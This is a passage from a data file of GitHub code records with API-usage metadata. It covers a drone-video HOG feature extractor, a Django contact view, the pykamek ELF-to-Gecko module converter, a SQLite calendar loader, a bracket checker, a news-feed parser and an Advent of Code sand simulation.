"subprocess.call", "line_number": 64, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 71, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.path.splitext", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 136, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.path.splitext", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 159, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 173, "usage_type": "name"}, {"api_name": "os.path.path.basename", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path.exists", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 174, "usage_type": "name"}, {"api_name": "send2trash.send2trash", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 184, "usage_type": "name"}, {"api_name": "subprocess.call", "line_number": 185, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 191, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 197, "usage_type": 
"call"}, {"api_name": "subprocess.call", "line_number": 199, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 210, "usage_type": "name"}, {"api_name": "subprocess.call", "line_number": 223, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 228, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 234, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 236, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 245, "usage_type": "name"}, {"api_name": "os.path.path.basename", "line_number": 245, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 249, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 256, "usage_type": "attribute"}, {"api_name": "send2trash.send2trash", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 350, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 350, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 350, "usage_type": "name"}, {"api_name": "os.path.path.expanduser", "line_number": 371, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 371, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 371, "usage_type": "name"}, {"api_name": "os.path.listdir", "line_number": 372, "usage_type": "call"}, {"api_name": "os.path", "line_number": 372, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 374, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 374, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 374, "usage_type": "name"}, {"api_name": "logging.NOTSET", "line_number": 378, "usage_type": "attribute"}]}
+{"seq_id": "14427950087", "text": "# !/usr/bin/python\nimport os\nimport time\nimport cv2 as cv\nimport numpy as np\nimport annot_parser\nimport myhog3d\nimport matplotlib.pyplot as plt\n# import seaborn as sns\nfrom collections import deque\n# import sklearn.??? as ??? # -- if needed\n\n## ---- REF ---\n# [1] [A Spatio-Temporal Descriptor Based on 3D-Gradients](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiirOSqjqPZAhUpwVQKHUpyB3AQFggsMAA&url=https%3A%2F%2Fhal.inria.fr%2Finria-00514853%2Fdocument&usg=AOvVaw0mijsjePgJYJ4jAGXSxANF)\n# [2] [Behavior recognition via sparse spatio-temporal features](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwicrKfEjqPZAhVFylQKHRjaB3AQFgg6MAE&url=https%3A%2F%2Fpdollar.github.io%2Ffiles%2Fpapers%2FDollarVSPETS05cuboids.pdf&usg=AOvVaw3P5KcCPAyHlxoHcp0dg-Xr)\n\n\ndef im2double(im):\n min_val = np.min(im.ravel())\n max_val = np.max(im.ravel())\n if max_val != min_val:\n out = (im.astype('float') - min_val) / (max_val - min_val)\n else:\n out = im.astype('float') / 255\n return out\n\ndata_path = \"D:/Proj/UAV/dataset/drones/\"\ndata_postfix = \".avi\"\nif not os.path.exists(\"../features3d\"): os.makedirs(\"../features3d\")\n\ncap = cv.VideoCapture()\n\ndrones_nums = [1, 11, 12, 18, 19, 29, 37, 46, 47, 48, 49, 53, 55, 56]\n\n# TRAIN_SET_RANGE = drones_nums\nTRAIN_SET_RANGE = [11]\nTRAIN_MODE = \"strict\"\nSAVE_FEATURE = False\n\nIF_SHOW_PATCH = not SAVE_FEATURE # warning: it can critically slow down extraction process\nIF_PLOT_HOG_FEATURE = not SAVE_FEATURE\n\n# parse videos in training set\nTIC = time.time()\nfor VID_NUM in TRAIN_SET_RANGE: #---- do all those shits down here\n # {\n \n locations, labels = annot_parser.parse(\"X:/UAV/annot/drones/\", VID_NUM)\n data_num = VID_NUM\n\n cap = cv.VideoCapture(data_path + \"Video_%s\"%data_num + data_postfix)\n file_out = open(\"../features3d/feature3d_%d.txt\"%VID_NUM, 'w')\n\n # parse each video \n time_stamp = 0\n CUBE_X, CUBE_Y, CUBE_T = 40 , 40, 4; # define the size of each st-cube to be processed\n\n tic = time.time()\n \n buffer = deque() # buffer for st-cube\n while(True):\n ret, frame = cap.read()\n if not ret: break\n frame = cv.cvtColor(frame, cv.COLOR_BGR2GRAY) # now is uint\n\n frame = im2double(frame)# caution: set each frame as double\n\n # the coord range of each st-cube\n x_0 = locations[time_stamp][0] # 1\n x_1 = locations[time_stamp][2] # 3\n y_0 = locations[time_stamp][1] # 2\n y_1 = locations[time_stamp][3] # 4\n\n\n\n ## !!!! 
WE MAY NEED MORE SAMPLES IN THIS SEC !!!\n if not x_0 == -1 : # annot-parser would return coord as -1 if no target is in current frame\n patch = frame[x_0:x_1, y_0:y_1]\n patch = cv.resize(patch, (CUBE_X, CUBE_Y)) # size of target area varies in time so we resize each patch to a certain size, fitting HoG Descriptor.\n else:\n rand_nega_x = int(np.floor((frame.shape[0] - CUBE_X) * np.random.rand()))\n rand_nega_y = int(np.floor((frame.shape[1] - CUBE_Y) * np.random.rand()))\n patch = frame[rand_nega_x : rand_nega_x + CUBE_X, rand_nega_y : rand_nega_y + CUBE_Y]\n\n # ----------------- ST-CUBE generation with deque buffer --------------|\n buffer.append(patch) # push a patch to the rear of stcube \n\n if len(buffer) == CUBE_T + 1: \n buffer.popleft() # pop a frame from head when buffer is filled\n stcube = np.array(buffer)\n # print(stcube.shape)\n\n label_cube = labels[time_stamp - CUBE_T + 1: time_stamp + 1]\n \n if CUBE_T < 5 and IF_SHOW_PATCH:\n for k in range(CUBE_T):\n plt.subplot(1, CUBE_T, k + 1)\n plt.title(label_cube[k])\n plt.imshow(stcube[:][:][k])\n plt.show()\n\n\n\n if TRAIN_MODE == \"strict\":\n FINAL_LABEL_FOR_CUBE = 1\n for label_of_frame in label_cube:\n FINAL_LABEL_FOR_CUBE = FINAL_LABEL_FOR_CUBE and label_of_frame\n elif TRAIN_MODE == \"loose\":\n FINAL_LABEL_FOR_CUBE = 0\n for label_of_frame in label_cube:\n FINAL_LABEL_FOR_CUBE = FINAL_LABEL_FOR_CUBE or label_of_frame\n elif TRAIN_MODE == \"current\":\n FINAL_LABEL_FOR_CUBE = labels[time_stamp]\n else:\n FINAL_LABEL_FOR_CUBE = labels[time_stamp]\n\n FHOG3D = myhog3d.compute(stcube, (10, 4), (10, 4), 2)\n\n if IF_PLOT_HOG_FEATURE:\n plt.plot(FHOG3D)\n plt.title(\"VID[%d], LAB[c%s : f%s], [%d / %d]\"%(VID_NUM, FINAL_LABEL_FOR_CUBE, labels[time_stamp], time_stamp, locations.shape[0]))\n plt.show()\n\n assert label_cube[-1] == labels[time_stamp]\n\n if SAVE_FEATURE:\n file_out.write(\"%d \" % (FINAL_LABEL_FOR_CUBE))\n for idx in range(FHOG3D.size):\n # idx + 1 to fit libsvm format (xgb)\n file_out.write(\"%d:%f \" % (idx + 1, FHOG3D[idx]))\n file_out.write('\\n')\n\n time_stamp = time_stamp + 1\n if time_stamp == locations.shape[0] : break\n\n toc = time.time() - tic\n print(\"Time elapsed: %5.3f sec;\"%toc)\n # if len(buffer) == CUBE_T: print(\"Buffer size correct: %d for %d.\"%(len(buffer), CUBE_T))\n\nTOC = time.time() - TIC\nprint(\"/ / / / / / / / / / / /\\nDataset generated in: %5.3f sec.\"%TOC)\n", "repo_name": "pigtamer/uav_py_feature", "sub_path": "hogger/deprecated/extract3d.py", "file_name": "extract3d.py", "file_ext": "py", "file_size_in_byte": 5483, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.min", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 31, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "annot_parser.parse", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 64, "usage_type": "call"}, 
{"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "myhog3d.compute", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "time.time", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "1778120262", "text": "from django.shortcuts import render\n# from django.http import HttpResponse\nfrom .forms import ContactForm\nfrom .models import Contact\nfrom django.http import HttpResponseRedirect\n\n# Create your views here.\ndef contact(request):\n form = ContactForm()\n return render(request,\"contato.html\",{\"form\":form})\n\ndef saving_contact(request):\n form = ContactForm(request.POST)\n if form.is_valid():\n contato_enviado = Contact(name=form.cleaned_data['name'],\n email=form.cleaned_data['email'],\n phone=form.cleaned_data['phone'],\n subject=form.cleaned_data['subject'],\n message=form.cleaned_data['message'])\n contato_enviado.save()\n return HttpResponseRedirect('/')\n", "repo_name": "alexzwir/zwodonto_old", "sub_path": "website/contact/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "forms.ContactForm", "line_number": 9, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Contact", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "19561293313", "text": "__version__ = \"1.0.3\"\n__author__ = 'JoshuaMK'\n__credits__ = 'Treeki'\n\nimport re\nfrom argparse import ArgumentParser\nfrom io import BytesIO\nfrom pathlib import Path\nfrom typing import List, Union\n\nfrom dolreader.dol import DolFile\n\nfrom pykamek import __version__\nfrom pykamek.addressmapper import AddressMapper\nfrom pykamek.exceptions import InvalidDataException\nfrom pykamek.kamek import KamekBinary\nfrom pykamek.linker import Linker\nfrom pykamek.versionmap import VersionMapper\n\n\ndef sorted_alphanumeric(l):\n \"\"\" Sort the given iterable in the way that humans expect.\"\"\"\n def convert(text): return int(text) if text.isdigit() else text\n def alphanum_key(key): return [convert(c)\n for c in re.split('([0-9]+)', str(key))]\n return sorted(l, key=alphanum_key)\n\n\nclass ElfHandler(Linker):\n def __init__(self, base: AddressMapper, files: Union[Path, List[Path]]):\n super().__init__(base)\n\n self.outputPath = None\n self.versionMap = None\n self.externals = {}\n\n if isinstance(files, Path):\n self.add_module(files)\n elif isinstance(files, str):\n self.add_module(Path(files))\n else:\n for obj in sorted_alphanumeric(files):\n obj = Path(obj)\n if obj.is_file():\n self.add_module(obj)\n else:\n for f in sorted_alphanumeric(obj.iterdir()):\n if f.is_file:\n self.add_module(f)\n\n def __repr__(self):\n return f\"repr={vars(self)}\"\n\n def __str__(self):\n return f\"ELF module converter; {self.__repr__()}\"\n\n @staticmethod\n def read_externals(file: str) -> dict:\n symbolDict = {}\n assignmentRegex = re.compile(\n r\"^\\s*([a-zA-Z0-9_<>,\\-\\$]+)\\s*=\\s*0x([a-fA-F0-9]+)\\s*(#.*)?$\")\n\n with open(file, \"r\") as f:\n for i, line in enumerate(f.readlines()):\n if line.strip() == \"\" or line.strip().startswith(\"#\") or line.strip().startswith(\"//\"):\n continue\n\n try:\n match = re.findall(assignmentRegex, line.strip())\n _symbol = match[0][0]\n _address = match[0][1]\n except IndexError:\n raise InvalidDataException(\n f\"Symbol definition {line.strip()} at line {i} is an invalid entry\")\n\n try:\n symbolDict[_symbol] = int(_address, 16)\n except ValueError:\n raise InvalidDataException(\n f\"Address {_address} at line {i} is not a hexadecimal number\")\n\n return symbolDict\n\n\ndef main(args: list):\n parser = ArgumentParser(\n f\"pykamek {__version__}\", description=\"ELF to Kuribo module converter\")\n\n parser.add_argument(\n \"elf\", help=\"ELF object file(s) and or folders of ELF object files\", nargs=\"+\")\n parser.add_argument(\n \"--dynamic\", help=\"The module is dynamically relocated\", action=\"store_true\")\n parser.add_argument(\n \"--static\", help=\"The module is statically located at ADDR\", metavar=\"ADDR\")\n parser.add_argument(\n \"--output-kamek\", help=\"File to output Kamek Binary\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-riiv\", help=\"File to output riivolution XML\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-gecko\", help=\"File to output gecko code\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-code\", help=\"File to output raw code\", metavar=\"FILE\")\n parser.add_argument(\"--input-dol\", help=\"Input DOL file\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-dol\", help=\"File to output patched DOL\", metavar=\"FILE\")\n parser.add_argument(\"--extern\", help=\"External linker map\", metavar=\"FILE\")\n parser.add_argument(\n \"--versionmap\", help=\"Version map for address translations\", metavar=\"FILE\")\n\n args = parser.parse_args(args)\n\n if 
args.dynamic and args.static:\n parser.error(\"Args `--dynamic' and `--static' cannot be used together\")\n elif not args.dynamic and not args.static:\n parser.error(\"Must provide either `--dynamic' or `--static' arguments\")\n\n _externals = None\n _versionMap = None\n\n if args.dynamic:\n _baseAddr = None\n elif args.static:\n _baseAddr = int(args.static, 16)\n\n _externals = {}\n if args.extern:\n _externals = ElfHandler.read_externals(Path(args.extern).resolve())\n\n if args.versionmap:\n _versionMap = VersionMapper(Path(args.versionmap).resolve())\n else:\n _versionMap = VersionMapper()\n\n _outputKamekPath = None\n _outputRiivPath = None\n _outputGeckoPath = None\n _outputCodePath = None\n _inputDolPath = None\n _outputDolPath = None\n\n if args.output_kamek:\n _outputKamekPath = Path(args.output_kamek).resolve()\n if args.output_riiv:\n _outputRiivPath = Path(args.output_riiv).resolve()\n if args.output_gecko:\n _outputGeckoPath = Path(args.output_gecko).resolve()\n if args.output_code:\n _outputCodePath = Path(args.output_code).resolve()\n if args.input_dol:\n _inputDolPath = Path(args.input_dol).resolve()\n if args.output_dol:\n _outputDolPath = Path(args.output_dol).resolve()\n\n if (_outputKamekPath is None and\n _outputRiivPath is None and\n _outputGeckoPath is None and\n _outputCodePath is None and\n _outputDolPath is None\n ):\n parser.error(\"No output path(s) specified\")\n\n if _inputDolPath is None and _outputDolPath:\n parser.error(\"Input DOL path not specified\")\n\n for versionKey in _versionMap.mappers:\n print(f\"Linking version {versionKey}\")\n\n elfConverter = ElfHandler(_versionMap.mappers[versionKey], args.elf)\n\n if _baseAddr:\n elfConverter.link_static(_externals, _baseAddr)\n else:\n elfConverter.link_dynamic(_externals)\n\n kb = KamekBinary()\n kb.load_from_linker(elfConverter)\n if _outputKamekPath:\n with open(str(_outputKamekPath).replace(\"$KV$\", versionKey), \"wb\") as kBinary:\n kBinary.write(kb.pack().getvalue())\n if _outputRiivPath:\n with open(str(_outputRiivPath).replace(\"$KV$\", versionKey), \"w\") as kBinary:\n kBinary.write(kb.pack_riivo())\n if _outputGeckoPath:\n with open(str(_outputGeckoPath).replace(\"$KV$\", versionKey), \"w\") as kBinary:\n kBinary.write(kb.pack_gecko_codes())\n if _outputCodePath:\n with open(str(_outputCodePath).replace(\"$KV$\", versionKey), \"wb\") as kBinary:\n kBinary.write(kb.rawCode.getvalue())\n\n if _outputDolPath:\n dol = DolFile(BytesIO(_inputDolPath.read_bytes()))\n kb.apply_to_dol(dol)\n\n outPath = str(_outputDolPath).replace(\"$KV$\", versionKey)\n\n with open(outPath, \"wb\") as outDol:\n dol.save(outDol)\n\n print(\"Finished execution\")\n", "repo_name": "JoshuaMKW/pykamek", "sub_path": "pykamek/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.split", "line_number": 25, "usage_type": "call"}, {"api_name": "pykamek.linker.Linker", "line_number": 29, "usage_type": "name"}, {"api_name": "pykamek.addressmapper.AddressMapper", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 30, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "argument"}, {"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": 
"pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 69, "usage_type": "call"}, {"api_name": "pykamek.exceptions.InvalidDataException", "line_number": 73, "usage_type": "call"}, {"api_name": "pykamek.exceptions.InvalidDataException", "line_number": 79, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 86, "usage_type": "call"}, {"api_name": "pykamek.__version__", "line_number": 87, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 127, "usage_type": "call"}, {"api_name": "pykamek.versionmap.VersionMapper", "line_number": 130, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 130, "usage_type": "call"}, {"api_name": "pykamek.versionmap.VersionMapper", "line_number": 132, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 144, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 146, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 148, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 150, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 152, "usage_type": "call"}, {"api_name": "pykamek.kamek.KamekBinary", "line_number": 175, "usage_type": "call"}, {"api_name": "dolreader.dol.DolFile", "line_number": 191, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 191, "usage_type": "call"}]}
+{"seq_id": "27291739909", "text": "from collections import deque\ndef findRedundantBrackets(s:str):\n stack = deque()\n i = 0\n while i < len(s):\n if s[i] == '(' or s[i] == '{' or s[i] == '[':\n stack.append(s[i])\n if (s[i] == '+' or s[i] == '-' or s[i] == '*' or s[i] == '/') and len(stack) != 0:\n while i != len(s):\n if s[i] == ')' or s[i] == '}' or s[i] == ']':\n stack.pop()\n break\n i += 1\n i += 1 \n if len(stack) == 0:\n return 'No'\n else:\n return 'Yes'\n\nprint(findRedundantBrackets('(a+b)'))", "repo_name": "yugsharma1711/DS-ALGO", "sub_path": "Stacks/redundantRemoval.py", "file_name": "redundantRemoval.py", "file_ext": "py", "file_size_in_byte": 662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "543940191", "text": "import re\n\nimport feedparser\nfrom django.conf import settings\nfrom django.core.cache import cache\n\n\ndef convert_http_to_https(url):\n url = url.replace(\"http://\", \"https://\") if url and url.startswith('http://') else url\n return url\n\n\ndef get_news_cached(base_url):\n cache_key = 'news_cache_key'\n news = cache.get(cache_key)\n if not news:\n news = get_news(base_url)\n cache.set(cache_key, news, settings.NEWS_FEED_CACHE_TIMEOUT)\n return news\n\n\ndef get_news(base_url):\n img_re = re.compile(r' ')\n slug_re = re.compile(r'([\\w-]+$)')\n entries = get_news_feeds()\n for entity in entries:\n img_search = img_re.search(entity.description)\n try:\n entity.image = convert_http_to_https(img_search.group(1))\n entity.parsed_description = img_re.sub('', entity.description)\n except AttributeError:\n entity.parsed_description = entity.description\n\n try:\n entity.slug = slug_re.search(entity.link).group(1)\n entity.real_link = base_url + entity.slug if base_url and entity.slug else entity.link\n except AttributeError:\n entity.slug = None\n entity.real_link = entity.link\n\n if not hasattr(entity, 'image') or not entity.image:\n entity.is_default_image = True\n entity.image = settings.NEWS_FEED_DEFAULT_IMAGE\n\n return entries\n\n\ndef get_news_feeds():\n feed = feedparser.parse(settings.NEWS_FEED_URL)\n return feed.entries\n", "repo_name": "City-of-Helsinki/digihel", "sub_path": "news/news.py", "file_name": "news.py", "file_ext": "py", "file_size_in_byte": 1523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.core.cache.cache.get", "line_number": 15, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 15, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 18, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.NEWS_FEED_CACHE_TIMEOUT", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.settings.NEWS_FEED_DEFAULT_IMAGE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "feedparser.parse", "line_number": 49, "usage_type": "call"}, {"api_name": "django.conf.settings.NEWS_FEED_URL", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 49, "usage_type": "name"}]}
+{"seq_id": "33608091415", "text": "import sqlite3\nfrom sqlite3 import Error\nimport numpy as np \nimport pandas as pd\nfrom datetime import datetime, time\n\n\ndef create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return conn\n\n\ndef fetch_slots(conn):\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM slots;')\n\n rows = cur.fetchall()\n\n slots = []\n for row in rows:\n slots.append(row)\n\n return slots\n\ndef create_calender(conn, calender):\n sql = ''' INSERT INTO calender(user_id,slot_id)\n VALUES(?,?) '''\n cur = conn.cursor()\n cur.execute(sql, calender)\n conn.commit()\n return cur.lastrowid\n\ndef main():\n \n # Enter Path where you want your database to be:\n database = r\"database.db\"\n\n\n # create a database connection => Db will be created if there does not exists one.\n conn = create_connection(database)\n\n with conn:\n\n slots = fetch_slots(conn)\n\n for slot in slots:\n\n # calender = (7, slot[0])\n # create_calender(conn, calender)\n # calender = (8, slot[0])\n # create_calender(conn, calender)\n calender = (10, slot[0])\n create_calender(conn, calender)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Poornartha/RasaChatbot", "sub_path": "actions/load_calender.py", "file_name": "load_calender.py", "file_ext": "py", "file_size_in_byte": 1308, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "37329692972", "text": "from collections import defaultdict\nfrom copy import deepcopy\nimport sys\n\ndo_print = True if '--print' in sys.argv else False\nfile_arg = [arg for arg in sys.argv[1:] if arg != '--print']\ninput = open(file_arg[0] if len(file_arg) >= 1 else 'input').read()\nlines = input.split('\\n')\n\ngrid = defaultdict(lambda: '.')\n\nfor line in lines:\n path = [(int(x), int(y)) for x, y in [pair.split(',') for pair in line.split(' -> ')]]\n\n for (sx, sy), (ex, ey) in list(zip(path, path[1:])):\n sx, ex = sorted([sx, ex])\n sy, ey = sorted([sy, ey])\n for y in range(sy, ey + 1):\n for x in range(sx, ex + 1):\n grid[(x,y)] = '#'\n\ndef get_bounds(grid: defaultdict[tuple[int, int], str]):\n min_x, max_x, min_y, max_y = 999999999, 0, 999999999, 0\n for (x,y), _ in grid.items():\n if x < min_x:\n min_x = x\n if x > max_x:\n max_x = x\n if y < min_y:\n min_y = y\n if y > max_y:\n max_y = y\n return min_x, max_x, min_y, max_y\n\ndef print_state(grid):\n minx, maxx, miny, maxy = get_bounds(grid)\n G = [[grid[(x,y)] for x in range(minx, maxx + 1)] for y in range(miny, maxy + 1)]\n for row in G:\n print(\"\".join(row))\n\ndef find_move(grid: defaultdict[tuple[int, int], str], sand: tuple[int, int], maxy: int):\n down = lambda p: (p[0], p[1]+1)\n diag_left = lambda p: (p[0]-1, p[1]+1)\n diag_right = lambda p: (p[0]+1, p[1]+1)\n\n for op in [down, diag_left, diag_right]:\n nx, ny = op(sand)\n\n if maxy != None and ny == maxy:\n return None\n # If we can move the sand in the current direction let's do it\n if grid[(nx, ny)] == '.':\n return (nx, ny)\n return None\n\n\n# Simulation time\ndef run_simulation(input_grid: defaultdict[tuple[int, int], str], part1: bool):\n grid = deepcopy(input_grid)\n _, _, _, maxy = get_bounds(grid)\n sand_origin = (500, 0)\n continue_simulation = True\n while continue_simulation:\n # Spawn 1 below the origin\n sand = (sand_origin[0], sand_origin[1])\n while True:\n move = find_move(grid, sand, None if part1 else maxy + 2)\n\n if move == None:\n grid[sand] = 'o'\n if part1 == False and sand == sand_origin:\n continue_simulation = False\n break\n else:\n if part1 and sand[1] > maxy:\n continue_simulation = False\n break\n sand = move\n \n return grid\n\n# Print initial grid state\ndo_print and print_state(grid)\n\n# Print part 1\np1_grid = run_simulation(grid, True)\ndo_print and print_state(p1_grid)\nprint(sum(1 for x in p1_grid.values() if x == 'o'))\n\n# Print part 2\np2_grid = run_simulation(grid, False)\ndo_print and print_state(p2_grid)\nprint(sum(1 for x in p2_grid.values() if x == 'o'))", "repo_name": "timfennis/advent-of-code-2022", "sub_path": "python/day14/day14.py", "file_name": "day14.py", "file_ext": "py", "file_size_in_byte": 2875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 41, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 58, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 59, "usage_type": "call"}]}
